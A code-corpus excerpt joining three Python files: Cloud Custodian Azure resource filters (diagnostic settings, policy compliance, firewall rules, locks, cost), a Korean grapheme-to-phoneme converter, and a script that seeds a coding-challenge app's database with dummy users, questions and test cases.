if action_date.tzinfo:
action_date = action_date.astimezone(self.tz)
current_date = now(tz=self.tz)
else:
current_date = now()
return current_date >= (
action_date - timedelta(days=self.skew, hours=self.skew_hours))
class DiagnosticSettingsFilter(ValueFilter):
"""The diagnostic settings filter is implicitly just the ValueFilter
on the diagnostic settings for an azure resource.
:example:
Find Load Balancers that have logs for both LoadBalancerProbeHealthStatus category and
LoadBalancerAlertEvent category enabled.
The use of value_type: swap is important for these examples because it swaps the value
and the evaluated key so that it evaluates the value provided is in the logs.
.. code-block:: yaml
policies
- name: find-load-balancers-with-logs-enabled
resource: azure.loadbalancer
filters:
- type: diagnostic-settings
key: logs[?category == 'LoadBalancerProbeHealthStatus'][].enabled
value: True
op: in
value_type: swap
- type: diagnostic-settings
key: logs[?category == 'LoadBalancerAlertEvent'][].enabled
value: True
op: in
value_type: swap
:example:
Find KeyVaults that have logs enabled for the AuditEvent category.
.. code-block:: yaml
policies
- name: find-keyvaults-with-logs-enabled
resource: azure.keyvault
filters:
- type: diagnostic-settings
key: logs[?category == 'AuditEvent'][].enabled
value: True
op: in
value_type: swap
"""
schema = type_schema('diagnostic-settings', rinherit=ValueFilter.schema)
schema_alias = True
log = logging.getLogger('custodian.azure.filters.DiagnosticSettingsFilter')
def process(self, resources, event=None):
futures = []
results = []
# Process each resource in a separate thread, returning all that pass filter
with self.executor_factory(max_workers=3) as w:
for resource_set in chunks(resources, 20):
futures.append(w.submit(self.process_resource_set, resource_set))
for f in as_completed(futures):
if f.exception():
self.log.warning(
"Diagnostic settings filter error: %s" % f.exception())
continue
else:
results.extend(f.result())
return results
def process_resource_set(self, resources):
#: :type: azure.mgmt.monitor.MonitorManagementClient
client = self.manager.get_client('azure.mgmt.monitor.MonitorManagementClient')
matched = []
for resource in resources:
settings = client.diagnostic_settings.list(resource['id'])
settings = [s.as_dict() for s in settings.value]
filtered_settings = super(DiagnosticSettingsFilter, self).process(settings, event=None)
if filtered_settings:
matched.append(resource)
return matched
class PolicyCompliantFilter(Filter):
"""Filter resources based on Azure Policy compliance status
Filter resources by their current Azure Policy compliance status.
You can specify if you want to filter compliant or non-compliant resources.
You can provide a list of Azure Policy definitions display names or names to limit
amount of non-compliant resources. By default it returns a list of all non-compliant
resources.
.. code-block :: yaml
policies:
- name: non-compliant-vms
resource: azure.vm
filters:
- type: policy-compliant
compliant: false
definitions:
- "Definition display name 1"
- "Definition display name 2"
"""
schema = type_schema('policy-compliant', required=['type', 'compliant'],
compliant={'type': 'boolean'},
definitions={'type': 'array'})
schema_alias = True
def __init__(self, data, manager=None):
super(PolicyCompliantFilter, self).__init__(data, manager)
self.compliant = self.data['compliant']
self.definitions = self.data.get('definitions')
def process(self, resources, event=None):
s = self.manager.get_session()
definition_ids = None
# Translate definitions display names into ids
if self.definitions:
policyClient = s.client("azure.mgmt.resource.policy.PolicyClient")
definitions = [d for d in policyClient.policy_definitions.list()]
definition_ids = [d.id.lower() for d in definitions
if d.display_name in self.definitions or
d.name in self.definitions]
# Find non-compliant resources
client = PolicyInsightsClient(s.get_credentials())
query = client.policy_states.list_query_results_for_subscription(
policy_states_resource='latest', subscription_id=s.subscription_id).value
non_compliant = [f.resource_id.lower() for f in query
if not definition_ids or f.policy_definition_id.lower() in definition_ids]
if self.compliant:
return [r for r in resources if r['id'].lower() not in non_compliant]
else:
return [r for r in resources if r['id'].lower() in non_compliant]
class AzureOffHour(OffHour):
# Override get_tag_value because Azure stores tags differently from AWS
def get_tag_value(self, i):
tag_value = TagHelper.get_tag_value(resource=i,
tag=self.tag_key,
utf_8=True)
if tag_value is not False:
tag_value = tag_value.lower().strip("'\"")
return tag_value
class AzureOnHour(OnHour):
# Override get_tag_value because Azure stores tags differently from AWS
def get_tag_value(self, i):
tag_value = TagHelper.get_tag_value(resource=i,
tag=self.tag_key,
utf_8=True)
if tag_value is not False:
tag_value = tag_value.lower().strip("'\"")
return tag_value
@six.add_metaclass(ABCMeta)
class FirewallRulesFilter(Filter):
"""Filters resources by the firewall rules
Rules can be specified as x.x.x.x-y.y.y.y or x.x.x.x or x.x.x.x/y.
With the exception of **equal** all modes reference total IP space and ignore
specific notation.
**include**: True if all IP space listed is included in firewall.
**any**: True if any overlap in IP space exists.
**only**: True if firewall IP space only includes IPs from provided space
(firewall is subset of provided space).
**equal**: the list of IP ranges or CIDR that firewall rules must match exactly.
**IMPORTANT**: this filter ignores all bypass rules. If you want to ensure your resource is
not available for other Azure Cloud services or from the Portal, please use ``firewall-bypass``
filter.
:example:
.. code-block:: yaml
policies:
- name: servers-with-firewall
resource: azure.sqlserver
filters:
- type: firewall-rules
include:
- '131.107.160.2-131.107.160.3'
- 10.20.20.0/24
"""
schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
'type': {'enum': ['firewall-rules']},
'include': {'type': 'array', 'items': {'type': 'string'}},
'any': {'type': 'array', 'items': {'type': 'string'}},
'only': {'type': 'array', 'items': {'type': 'string'}},
'equal': {'type': 'array', 'items': {'type': 'string'}}
},
'oneOf': [
{"required": ["type", "include"]},
{"required": ["type", "any"]},
{"required": ["type", "only"]},
{"required": ["type", "equal"]}
]
}
schema_alias = True
log = logging.getLogger('custodian.azure.filters.FirewallRulesFilter')
def __init__(self, data, manager=None):
super(FirewallRulesFilter, self).__init__(data, manager)
self.policy_include = None
self.policy_equal = None
self.policy_any = None
self.policy_only = None
self.client = None
def process(self, resources, event=None):
self.policy_include = IpRangeHelper.parse_ip_ranges(self.data, 'include')
self.policy_equal = IpRangeHelper.parse_ip_ranges(self.data, 'equal')
self.policy_any = IpRangeHelper.parse_ip_ranges(self.data, 'any')
self.policy_only = IpRangeHelper.parse_ip_ranges(self.data, 'only')
self.client = self.manager.get_client()
result, _ = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._check_resources,
executor_factory=self.executor_factory,
log=self.log
)
return result
def _check_resources(self, resources, event):
return [r for r in resources if self._check_resource(r)]
@abstractmethod
def _query_rules(self, resource):
"""
Queries firewall rules for a resource. Override in concrete classes.
:param resource:
:return: A set of netaddr.IPSet with rules defined for the resource.
"""
raise NotImplementedError()
def _check_resource(self, resource):
resource_rules = self._query_rules(resource)
ok = self._check_rules(resource_rules)
return ok
def _check_rules(self, resource_rules):
if self.policy_equal is not None:
return self.policy_equal == resource_rules
elif self.policy_include is not None:
return self.policy_include.issubset(resource_rules)
elif self.policy_any is not None:
return not self.policy_any.isdisjoint(resource_rules)
elif self.policy_only is not None:
return resource_rules.issubset(self.policy_only)
else: # validated earlier, can never happen
raise FilterValidationError("Internal error.")
@six.add_metaclass(ABCMeta)
class FirewallBypassFilter(Filter):
"""Filters resources by the firewall bypass rules
"""
@staticmethod
def schema(values):
return type_schema(
'firewall-bypass',
required=['mode', 'list'],
**{
'mode': {'enum': ['include', 'equal', 'any', 'only']},
'list': {'type': 'array', 'items': {'enum': values}}
})
log = logging.getLogger('custodian.azure.filters.FirewallRulesFilter')
def __init__(self, data, manager=None):
super(FirewallBypassFilter, self).__init__(data, manager)
self.mode = self.data['mode']
self.list = set(self.data['list'])
self.client = None
def process(self, resources, event=None):
self.client = self.manager.get_client()
result, _ = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._check_resources,
executor_factory=self.executor_factory,
log=self.log
)
return result
def _check_resources(self, resources, event):
return [r for r in resources if self._check_resource(r)]
@abstractmethod
def _query_bypass(self, resource):
"""
Queries firewall rules for a resource. Override in concrete classes.
:param resource:
:return: A set of netaddr.IPSet with rules defined for the resource.
"""
raise NotImplementedError()
def _check_resource(self, resource):
bypass_set = set(self._query_bypass(resource))
ok = self._check_bypass(bypass_set)
return ok
def _check_bypass(self, bypass_set):
if self.mode == 'equal':
return self.list == bypass_set
elif self.mode == 'include':
return self.list.issubset(bypass_set)
elif self.mode == 'any':
return not self.list.isdisjoint(bypass_set)
elif self.mode == 'only':
return bypass_set.issubset(self.list)
else: # validated earlier, can never happen
raise FilterValidationError("Internal error.")
class ResourceLockFilter(Filter):
"""
Filter locked resources.
Lock can be of 2 types: ReadOnly and CanNotDelete. To filter any lock, use "Any" type.
Lock type is optional, by default any lock will be applied to the filter.
To get unlocked resources, use "Absent" type.
:example:
Get all keyvaults with ReadOnly lock:
.. code-block :: yaml
policies:
- name: locked-keyvaults
resource: azure.keyvault
filters:
- type: resource-lock
lock-type: ReadOnly
:example:
Get all locked sqldatabases (any type of lock):
.. code-block :: yaml
policies:
- name: locked-sqldatabases
resource: azure.sqldatabase
filters:
- type: resource-lock
:example:
Get all unlocked resource groups:
.. code-block :: yaml
policies:
- name: unlock-rgs
resource: azure.resourcegroup
filters:
- type: resource-lock
lock-type: Absent
"""
schema = type_schema(
'resource-lock', required=['type'],
**{
'lock-type': {'enum': ['ReadOnly', 'CanNotDelete', 'Any', 'Absent']},
})
schema_alias = True
log = logging.getLogger('custodian.azure.filters.ResourceLockFilter')
def __init__(self, data, manager=None):
super(ResourceLockFilter, self).__init__(data, manager)
self.lock_type = self.data.get('lock-type', 'Any')
def process(self, resources, event=None):
resources, exceptions = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._process_resource_set,
executor_factory=self.executor_factory,
log=self.log
)
if exceptions:
raise exceptions[0]
return resources
def _process_resource_set(self, resources, event=None):
client = self.manager.get_client('azure.mgmt.resource.locks.ManagementLockClient')
result = []
for resource in resources:
if is_resource_group(resource):
locks = [r.serialize(True) for r in
client.management_locks.list_at_resource_group_level(
resource['name'])]
else:
locks = [r.serialize(True) for r in client.management_locks.list_at_resource_level(
resource['resourceGroup'],
ResourceIdParser.get_namespace(resource['id']),
ResourceIdParser.get_resource_name(resource.get('c7n:parent-id')) or '',
ResourceIdParser.get_resource_type(resource['id']),
resource['name'])]
if StringUtils.equal('Absent', self.lock_type) and not locks:
result.append(resource)
else:
for lock in locks:
if StringUtils.equal('Any', self.lock_type) or \
StringUtils.equal(lock['properties']['level'], self.lock_type):
result.append(resource)
break
return result
class CostFilter(ValueFilter):
"""
Filter resources by the cost consumed over a timeframe.
Total cost for the resource includes costs for all of it child resources if billed
separately (e.g. SQL Server and SQL Server Databases). Warning message is logged if we detect
different currencies.
Timeframe options:
- Number of days before today
- All days in current calendar period until today:
- ``WeekToDate``
- ``MonthToDate``
- ``YearToDate``
- All days in the previous calendar period:
- ``TheLastWeek``
- ``TheLastMonth``
- ``TheLastYear``
:examples:
SQL servers that were cost more than 2000 in the last month.
.. code-block:: yaml
policies:
- name: expensive-sql-servers-last-month
resource: azure.sqlserver
filters:
- type: cost
timeframe: TheLastMonth
op: gt
value: 2000
SQL servers that were cost more than 2000 in the last 30 days not including today.
.. code-block:: yaml
policies:
- name: expensive-sql-servers
resource: azure.sqlserver
filters:
- type: cost
timeframe: 30
op: gt
value: 2000
"""
preset_timeframes = [i.value for i in TimeframeType if i.value != 'Custom']
schema = type_schema('cost',
rinherit=ValueFilter.schema,
required=['timeframe'],
key=None,
**{
'timeframe': {
'oneOf': [
{'enum': preset_timeframes},
{"type": "number", "minimum": 1}
]
}
})
schema_alias = True
log = logging.getLogger('custodian.azure.filters.CostFilter')
def __init__(self, data, manager=None):
data['key'] = 'PreTaxCost' # can also be Currency, but now only PreTaxCost is supported
super(CostFilter, self).__init__(data, manager)
self.cached_costs = None
def __call__(self, i):
if not self.cached_costs:
self.cached_costs = self._query_costs()
id = i['id'].lower() + "/"
costs = [k.copy() for k in self.cached_costs if (k['ResourceId'] + '/').startswith(id)]
if not costs:
return False
if any(c['Currency'] != costs[0]['Currency'] for c in costs):
self.log.warning('Detected different currencies for the resource {0}. Costs array: {1}'
.format(i['id'], costs))
total_cost = {
'PreTaxCost': sum(c['PreTaxCost'] for c in costs),
'Currency': costs[0]['Currency']
}
i[get_annotation_prefix('cost')] = total_cost
result = super(CostFilter, self).__call__(total_cost)
return result
def fix_wrap_rest_response(self, data):
"""
Azure REST API doesn't match the documentation and the python SDK fails to deserialize
the response.
This is a temporal workaround that converts the response into the correct form.
:param data: partially deserialized response that doesn't match the the spec.
:return: partially deserialized response that does match the the spec.
"""
type = data.get('type', None)
if type != 'Microsoft.CostManagement/query':
return data
data['value'] = [data]
data['nextLink'] = data['properties']['nextLink']
return data
def _query_costs(self):
manager = self.manager
is_resource_group = manager.type == 'resourcegroup'
client = manager.get_client('azure.mgmt.costmanagement.CostManagementClient')
aggregation = {'totalCost': QueryAggregation(name='PreTaxCost')}
grouping = [QueryGrouping(type='Dimension',
name='ResourceGroupName' if is_resource_group else 'ResourceId')]
query_filter = None
if not is_resource_group:
query_filter = QueryFilter(
dimension=QueryComparisonExpression(name='ResourceType',
operator='In',
values=[manager.resource_type.resource_type]))
if 'dimension' in query_filter._attribute_map:
query_filter._attribute_map['dimension']['key'] = 'dimensions'
dataset = QueryDataset(grouping=grouping, aggregation=aggregation, filter=query_filter)
timeframe = self.data['timeframe']
time_period = None
if timeframe not in CostFilter.preset_timeframes:
end_time = utcnow().replace(hour=0, minute=0, second=0, microsecond=0)
start_time = end_time - timedelta(days=timeframe)
timeframe = 'Custom'
time_period = QueryTimePeriod(from_property=start_time, to=end_time)
definition = QueryDefinition(timeframe=timeframe, time_period=time_period, dataset=dataset)
subscription_id = manager.get_session().get_subscription_id()
scope = '/subscriptions/' + subscription_id
query = client.query.usage_by_scope(scope, definition)
if hasattr(query, '_derserializer'):
original = query._derserializer._deserialize
query._derserializer._deserialize = lambda target, data: \
original(target, self.fix_wrap_rest_response(data))
result_list = list(query)[0]
result_list = [{result_list.columns[i].name: v for i, v in enumerate(row)}
for row in result_list.rows]
for r in result_list:
if 'ResourceGroupName' in r:
r['ResourceId'] = scope + '/resourcegroups/' + r.pop('ResourceGroupName')
r['ResourceId'] = r['ResourceId'].lower()
return result_list
class ParentFilter(Filter):
"""
Meta filter that allows you to filter child resources by applying filters to their
parent resources.
You can use any filter supported by corresponding parent resource type.
:examples:
Find Azure KeyVault Keys from Key Vaults with ``owner:ProjectA`` tag.
.. code-block:: yaml
policies:
- name: kv-keys-from-tagged-keyvaults
resource: azure.keyvault-key
filters:
- type: parent
filter:
type: value
key: tags.owner
value: ProjectA
"""
schema = type_schema(
'parent', filter={'type': 'object'}, required=['type'])
schema_alias = True
def __init__(self, data, manager=None):
super(ParentFilter, self).__init__(data, manager)
self.parent_manager = self.manager.get_parent_manager()
self.parent_filter = self.parent_manager.filter_registry.factory(
self.data['filter'],
self.parent_manager)
def process(self, resources, event=None):
parent_resources = self.parent_filter.process(self.parent_manager.resources())
parent_resources_ids = [p['id'] for p in parent_resources]
parent_key = self.manager.resource_type.parent_key
return [r for r in resources if r[parent_key] in parent_resources_ids]
| 34.545366 | 103 | 0.599311 |
5c0911ddfce99df154bd26199c4c7570917b900c | 8,183 | py | Python | text/g2p2_demo.py | DSAIL-SKKU/GST-Tacotron | 07f1c5d2fc8b2f2dcdd8f145b184887b35b5b0d9 | [
"MIT"
] | 2 | 2020-04-16T12:00:53.000Z | 2020-04-22T18:59:35.000Z | text/g2p2_demo.py | DSAIL-SKKU/GST-Tacotron | 07f1c5d2fc8b2f2dcdd8f145b184887b35b5b0d9 | [
"MIT"
] | null | null | null | text/g2p2_demo.py | DSAIL-SKKU/GST-Tacotron | 07f1c5d2fc8b2f2dcdd8f145b184887b35b5b0d9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
g2p.py
~~~~~~~~~~
This script converts Korean graphemes to romanized phones and then to pronunciation.
(1) graph2phone: convert Korean graphemes to romanized phones
(2) phone2prono: convert romanized phones to pronunciation
(3) graph2phone: convert Korean graphemes to pronunciation
Usage: $ python g2p.py '스물 여덟째 사람'
(NB. Please check 'rulebook_path' before usage.)
Yejin Cho (scarletcho@gmail.com)
Jaegu Kang (jaekoo.jk@gmail.com)
Hyungwon Yang (hyung8758@gmail.com)
Yeonjung Hong (yvonne.yj.hong@gmail.com)
Created: 2016-08-11
Last updated: 2017-02-22 Yejin Cho
* Key updates made:
- Executable in both Python 2 and 3.
- G2P Performance test available ($ python g2p.py test)
- G2P verbosity control available
'''
import datetime as dt
import re
import math
import sys
# import optparse
import argparse
def readfileUTF8(fname):
f = open(fname, 'r')
corpus = []
while True:
line = f.readline()
line = line.encode("utf-8")
line = re.sub(u'\n', u'', line)
if line != u'':
corpus.append(line)
if not line: break
f.close()
return corpus
def writefile(body, fname):
out = open(fname, 'w')
for line in body:
out.write('{}\n'.format(line))
out.close()
def readRules(pver, rule_book):
if pver == 2:
f = open(rule_book, 'r')
elif pver == 3:
f = open(rule_book, 'r',encoding="utf-8")
rule_in = []
rule_out = []
while True:
line = f.readline()
if pver == 2:
line = unicode(line.encode("utf-8"))
line = re.sub(u'\n', u'', line)
elif pver == 3:
line = re.sub('\n', '', line)
if line != u'':
if line[0] != u'#':
IOlist = line.split('\t')
rule_in.append(IOlist[0])
if IOlist[1]:
rule_out.append(IOlist[1])
else: # If output is empty (i.e. deletion rule)
rule_out.append(u'')
if not line: break
f.close()
return rule_in, rule_out
def isHangul(charint):
hangul_init = 44032
hangul_fin = 55203
return charint >= hangul_init and charint <= hangul_fin
def checkCharType(var_list):
# 1: whitespace
# 0: hangul
# -1: non-hangul
checked = []
for i in range(len(var_list)):
if var_list[i] == 32: # whitespace
checked.append(1)
elif isHangul(var_list[i]): # Hangul character
checked.append(0)
else: # Non-hangul character
checked.append(-1)
return checked
def graph2phone(graphs):
# Encode graphemes as utf8
try:
graphs = graphs.decode('utf8')
except AttributeError:
pass
#print("A >> %s", graphs)
integers = []
for i in range(len(graphs)):
integers.append(ord(graphs[i]))
# Romanization (according to Korean Spontaneous Speech corpus; 성인자유발화코퍼스)
phones = ''
ONS = ['k0', 'kk', 'nn', 't0', 'tt', 'rr', 'mm', 'p0', 'pp',
's0', 'ss', 'oh', 'c0', 'cc', 'ch', 'kh', 'th', 'ph', 'h0']
NUC = ['aa', 'qq', 'ya', 'yq', 'vv', 'ee', 'yv', 'ye', 'oo', 'wa',
'wq', 'wo', 'yo', 'uu', 'wv', 'we', 'wi', 'yu', 'xx', 'xi', 'ii']
COD = ['', 'kf', 'kk', 'ks', 'nf', 'nc', 'nh', 'tf',
'll', 'lk', 'lm', 'lb', 'ls', 'lt', 'lp', 'lh',
'mf', 'pf', 'ps', 's0', 'ss', 'oh', 'c0', 'ch',
'kh', 'th', 'ph', 'h0']
# Pronunciation
idx = checkCharType(integers)
iElement = 0
while iElement < len(integers):
if idx[iElement] == 0: # not space characters
base = 44032
df = int(integers[iElement]) - base
iONS = int(math.floor(df / 588)) + 1
iNUC = int(math.floor((df % 588) / 28)) + 1
iCOD = int((df % 588) % 28) + 1
s1 = '-' + ONS[iONS - 1] # onset
s2 = NUC[iNUC - 1] # nucleus
if COD[iCOD - 1]: # coda
s3 = COD[iCOD - 1]
else:
s3 = ''
tmp = s1 + s2 + s3
phones = phones + tmp
elif idx[iElement] == 1: # space character
# tmp = '#'
tmp = 'zz'
phones = phones + tmp
phones = re.sub('-(oh)', '-', phones)
iElement += 1
tmp = ''
# print("B >> %s" % phones)
# 초성 이응 삭제
phones = re.sub('^oh', '', phones)
# print("C >> %s" % phones)
phones = re.sub('-(oh)', '', phones)
# print("D >> %s" % phones)
# 받침 이응 'ng'으로 처리 (Velar nasal in coda position)
phones = re.sub('oh-', 'ng-', phones)
#print("D2 >> %s" % phones)
#phones = re.sub('oh([# ]|$)', 'ng', phones)
#phones = re.sub('oh([zz ]|$)', 'ng', phones)
phones = re.sub(u'ohzz', 'ngzz', phones)
phones = re.sub('oh$', 'ng', phones)
#print("E >> %s" % phones)
## Remove all characters except Hangul and syllable delimiter (hyphen; '-')
phones = re.sub('(\W+)\-', '\\1', phones)
phones = re.sub('\W+$', '', phones)
phones = re.sub('^\-', '', phones)
#print("F >> %s" % phones)
return phones
def phone2prono(phones, rule_in, rule_out):
# Apply g2p rules
for pattern, replacement in zip(rule_in, rule_out):
# print pattern
phones = re.sub(pattern, replacement, phones)
prono = phones
return prono
def addPhoneBoundary(phones):
# Add a comma (,) after every second alphabets to mark phone boundaries
ipos = 0
newphones = ''
while ipos + 2 <= len(phones):
if phones[ipos] == u'-':
newphones = newphones + phones[ipos]
ipos += 1
elif phones[ipos] == u' ':
ipos += 1
elif phones[ipos] == u'#':
newphones = newphones + phones[ipos]
ipos += 1
newphones = newphones + phones[ipos] + phones[ipos+1] + u','
ipos += 2
return newphones
def addSpace(phones):
ipos = 0
newphones = ''
while ipos < len(phones):
if ipos == 0:
newphones = newphones + phones[ipos] + phones[ipos + 1]
else:
newphones = newphones + ' ' + phones[ipos] + phones[ipos + 1]
ipos += 2
return newphones
def graph2prono(graphs, rule_in, rule_out):
romanized = graph2phone(graphs)
#print("1 [%s]"%romanized)
romanized_bd = addPhoneBoundary(romanized)
#print("2 [%s]"%romanized_bd)
prono = phone2prono(romanized_bd, rule_in, rule_out)
#print("3 [%s]"%prono)
prono = re.sub(u',', u' ', prono)
#print("4 [%s]"%prono)
prono = re.sub(u' $', u'', prono)
#print("5 [%s]"%prono)
prono = re.sub(u'#', u'-', prono)
#print("6 [%s]"%prono)
prono = re.sub(u'-+', u'-', prono)
#print("7 [%s]"%prono)
prono_prev = prono
identical = False
loop_cnt = 1
while not identical:
prono_new = phone2prono(re.sub(u' ', u',', prono_prev + u','), rule_in, rule_out)
prono_new = re.sub(u',', u' ', prono_new)
prono_new = re.sub(u' $', u'', prono_new)
if re.sub(u'-', u'', prono_prev) == re.sub(u'-', u'', prono_new):
identical = True
prono_new = re.sub(u'-', u'', prono_new)
else:
loop_cnt += 1
prono_prev = prono_new
return prono_new
def runKoG2PTest(graph, rulebook):
[rule_in, rule_out] = readRules(3, rulebook)
# if ver_info[0] == 2:
# prono = graph2prono(unicode(graph), rule_in, rule_out)
# elif ver_info[0] == 3:
prono = graph2prono(graph, rule_in, rule_out)
return prono
def makeTestData():
for line in sys.stdin:
print(line)
print(runKoG2PTest(line, 'text/rulebook.txt'))
def makeMetaData():
for line in sys.stdin:
l = line.split('|')
prefix = l[0]
content = l[1]
words = content.split(' ')
converted = ''
for x in range(len(words) - 1):
converted = converted + runKoG2PTest(words[x], 'rulebook.txt') + ' '
converted = converted + runKoG2PTest(words[len(words) - 1], 'rulebook.txt')
print("%s|%s" %(prefix, converted))
| 28.217241 | 89 | 0.527802 |
a08e96ad6005a1a828ac587ed4726db01ce6eca3 | 8,136 | py | Python | modelsDummyData.py | Rahul-RB/titanium-silver | 7d62e194e26adf15e26f6a84cbfc454cf5db5a7e | [
"MIT"
] | 1 | 2019-09-13T18:55:43.000Z | 2019-09-13T18:55:43.000Z | modelsDummyData.py | Rahul-RB/titanium-silver | 7d62e194e26adf15e26f6a84cbfc454cf5db5a7e | [
"MIT"
] | 1 | 2019-04-22T15:49:49.000Z | 2019-04-22T15:49:50.000Z | modelsDummyData.py | Rahul-RB/titanium-silver | 7d62e194e26adf15e26f6a84cbfc454cf5db5a7e | [
"MIT"
] | null | null | null | import argparse
import os
from server.flaskr import db
from server.flaskr.models import models
from uuid import uuid4
parser = argparse.ArgumentParser()
parser.add_argument("--dir",
help="Enter project root directory,\n\
eg if titanium_silver is in: /home/rahul/, enter /home/rahul/\n\
If you are already in the project dir, then give ..",
type=str,
required=True
)
args = parser.parse_args()
rootDir = os.path.abspath(args.dir)
inputDir = rootDir+"/titanium-silver/server/flaskr/codes/Input/"
outputDir = rootDir+"/titanium-silver/server/flaskr/codes/Output/"
testCaseDir = rootDir+"/titanium-silver/server/flaskr/codes/TestCases/"
expectedOutputDir = rootDir+"/titanium-silver/server/flaskr/codes/ExpectedOutputs/"
teacher_id = "01TI15ECS001"
t1 = models.Teacher(
ID=teacher_id,
name="Teacher 1",
designation="Asst Prof",
username="teacher1@teachers.com",
password="teacher1",
noOfChallenges=0
)
student_id = "01FB15ECS104"
s1 = models.Student(
ID=student_id,
name="Student 1",
semester="6th",
username="student1@students.com",
password="student1",
noOfChallenges=0
)
# c1uuid = str(uuid4().hex)
c1uuid = "c1"
c1 = models.Challenge(
ID=c1uuid,
teacherID=teacher_id,
status="INACTIVE",
timeLimitHrs=2,
timeLimitMins=30
)
# q1uuid = str(uuid4().hex)
q1uuid = "q1"
q1 = models.Question(
ID=q1uuid,
name="This is question 1",
CPU="2GHz",
memory="128m"
)
# q2uuid = str(uuid4().hex)
q2uuid = "q2"
q2 = models.Question(
ID=q2uuid,
name="This is question 2",
CPU="1GHz",
memory="128m"
)
# q3uuid = str(uuid4().hex)
q3uuid = "q3"
q3 = models.Question(
ID=q3uuid,
name="This is question 3",
CPU="1.5GHz",
memory="128m"
)
q1l = models.QuestionAndLanguage(
qID=q1uuid,
C=True,
CPP=False,
Python=True,
Python3=False,
Ruby=True,
PHP5x=False,
PHP7x=False,
Java=False
)
q2l = models.QuestionAndLanguage(
qID=q2uuid,
C=False,
CPP=True,
Python=True,
Python3=False,
Ruby=False,
PHP5x=False,
PHP7x=False,
Java=False
)
q3l = models.QuestionAndLanguage(
qID=q3uuid,
C=False,
CPP=False,
Python=True,
Python3=True,
Ruby=False,
PHP5x=False,
PHP7x=False,
Java=True
)
# t1_1uuid = str(uuid4().hex)
t1_1uuid = "t1_1"
t1_1 = models.TestCase(
ID=t1_1uuid,
testCasePath="TestCases/"+t1_1uuid,
expectedOutputPath="ExpectedOutputs/"+t1_1uuid
)
# t1_2uuid = str(uuid4().hex)
t1_2uuid = "t1_2"
t1_2 = models.TestCase(
ID=t1_2uuid,
testCasePath="TestCases/"+t1_2uuid,
expectedOutputPath="ExpectedOutputs/"+t1_2uuid
)
# t1_3uuid = str(uuid4().hex)
t1_3uuid = "t1_3"
t1_3 = models.TestCase(
ID=t1_3uuid,
testCasePath="TestCases/"+t1_3uuid,
expectedOutputPath="ExpectedOutputs/"+t1_3uuid
)
# t2uuid = str(uuid4().hex)
t2uuid = "t2"
t2 = models.TestCase(
ID=t2uuid,
testCasePath="TestCases/"+t2uuid,
expectedOutputPath="ExpectedOutputs/"+t2uuid
)
# t3uuid = str(uuid4().hex)
t3uuid = "t3"
t3 = models.TestCase(
ID=t3uuid,
testCasePath="TestCases/"+t3uuid,
expectedOutputPath="ExpectedOutputs/"+t3uuid
)
# t4uuid = str(uuid4().hex)
t4uuid = "t4"
t4 = models.TestCase(
ID=t4uuid,
testCasePath="TestCases/"+t4uuid,
expectedOutputPath="ExpectedOutputs/"+t4uuid
)
# t5uuid = str(uuid4().hex)
t5uuid = "t5"
t5 = models.TestCase(
ID=t5uuid,
testCasePath="TestCases/"+t5uuid,
expectedOutputPath="ExpectedOutputs/"+t5uuid
)
# t6uuid = str(uuid4().hex)
t6uuid = "t6"
t6 = models.TestCase(
ID=t6uuid,
testCasePath="TestCases/"+t6uuid,
expectedOutputPath="ExpectedOutputs/"+t6uuid
)
cq1 = models.ChallengeAndQuestion(
cID=c1uuid,
qID=q1uuid
)
cq2 = models.ChallengeAndQuestion(
cID=c1uuid,
qID=q2uuid
)
cq3 = models.ChallengeAndQuestion(
cID=c1uuid,
qID=q3uuid
)
qt1_1 = models.QuestionAndTestCase(
qID=q1uuid,
tID=t1_1uuid
)
qt1_2 = models.QuestionAndTestCase(
qID=q1uuid,
tID=t1_2uuid
)
qt1_3 = models.QuestionAndTestCase(
qID=q1uuid,
tID=t1_3uuid
)
qt2 = models.QuestionAndTestCase(
qID=q1uuid,
tID=t2uuid
)
qt3 = models.QuestionAndTestCase(
qID=q2uuid,
tID=t3uuid
)
qt4 = models.QuestionAndTestCase(
qID=q2uuid,
tID=t4uuid
)
qt5 = models.QuestionAndTestCase(
qID=q2uuid,
tID=t5uuid
)
qt6 = models.QuestionAndTestCase(
qID=q3uuid,
tID=t6uuid
)
cs1 = models.ChallengeAndStudent(
cID=c1uuid,
sID=student_id
)
sub1 = models.Submission(
sID=student_id,
cID=c1uuid,
qID=q1uuid,
codeFilePath=inputDir+student_id+"_"+q1uuid+".c",
compilePass=True,
progLang="C"
)
sub2 = models.Submission(
sID=student_id,
cID=c1uuid,
qID=q2uuid,
codeFilePath=inputDir+student_id+"_"+q2uuid+".cpp",
compilePass=False,
progLang="Python3"
)
sub3 = models.Submission(
sID=student_id,
cID=c1uuid,
qID=q3uuid,
codeFilePath=inputDir+student_id+"_"+q3uuid+".py",
compilePass=True,
progLang="Python"
)
subRes1 = models.SubmissionResult(
sID=student_id,
cID=c1uuid,
qID=q1uuid,
tID=t1_1uuid,
testPass=False
)
subRes2 = models.SubmissionResult(
sID=student_id,
cID=c1uuid,
qID=q1uuid,
tID=t2uuid,
testPass=True
)
subRes3 = models.SubmissionResult(
sID=student_id,
cID=c1uuid,
qID=q3uuid,
tID=t6uuid,
testPass=True
)
# Make Test case and Expected Output files
t1_1uuid_tc_path = testCaseDir+t1_1uuid
t1_2uuid_tc_path = testCaseDir+t1_2uuid
t1_3uuid_tc_path = testCaseDir+t1_3uuid
t2uuid_tc_path = testCaseDir+t2uuid
t3uuid_tc_path = testCaseDir+t3uuid
t4uuid_tc_path = testCaseDir+t4uuid
t5uuid_tc_path = testCaseDir+t5uuid
t6uuid_tc_path = testCaseDir+t6uuid
with open(t1_1uuid_tc_path,"w") as fp:
fp.write("t1_1")
with open(t1_2uuid_tc_path,"w") as fp:
fp.write("t1_2")
with open(t1_3uuid_tc_path,"w") as fp:
fp.write("t1_3")
with open(t2uuid_tc_path,"w") as fp:
fp.write("t2")
with open(t3uuid_tc_path,"w") as fp:
fp.write("t3")
with open(t4uuid_tc_path,"w") as fp:
fp.write("t4")
with open(t5uuid_tc_path,"w") as fp:
fp.write("t5")
with open(t6uuid_tc_path,"w") as fp:
fp.write("t6")
t1_1uuid_ex_path = expectedOutputDir+t1_1uuid
t1_2uuid_ex_path = expectedOutputDir+t1_2uuid
t1_3uuid_ex_path = expectedOutputDir+t1_3uuid
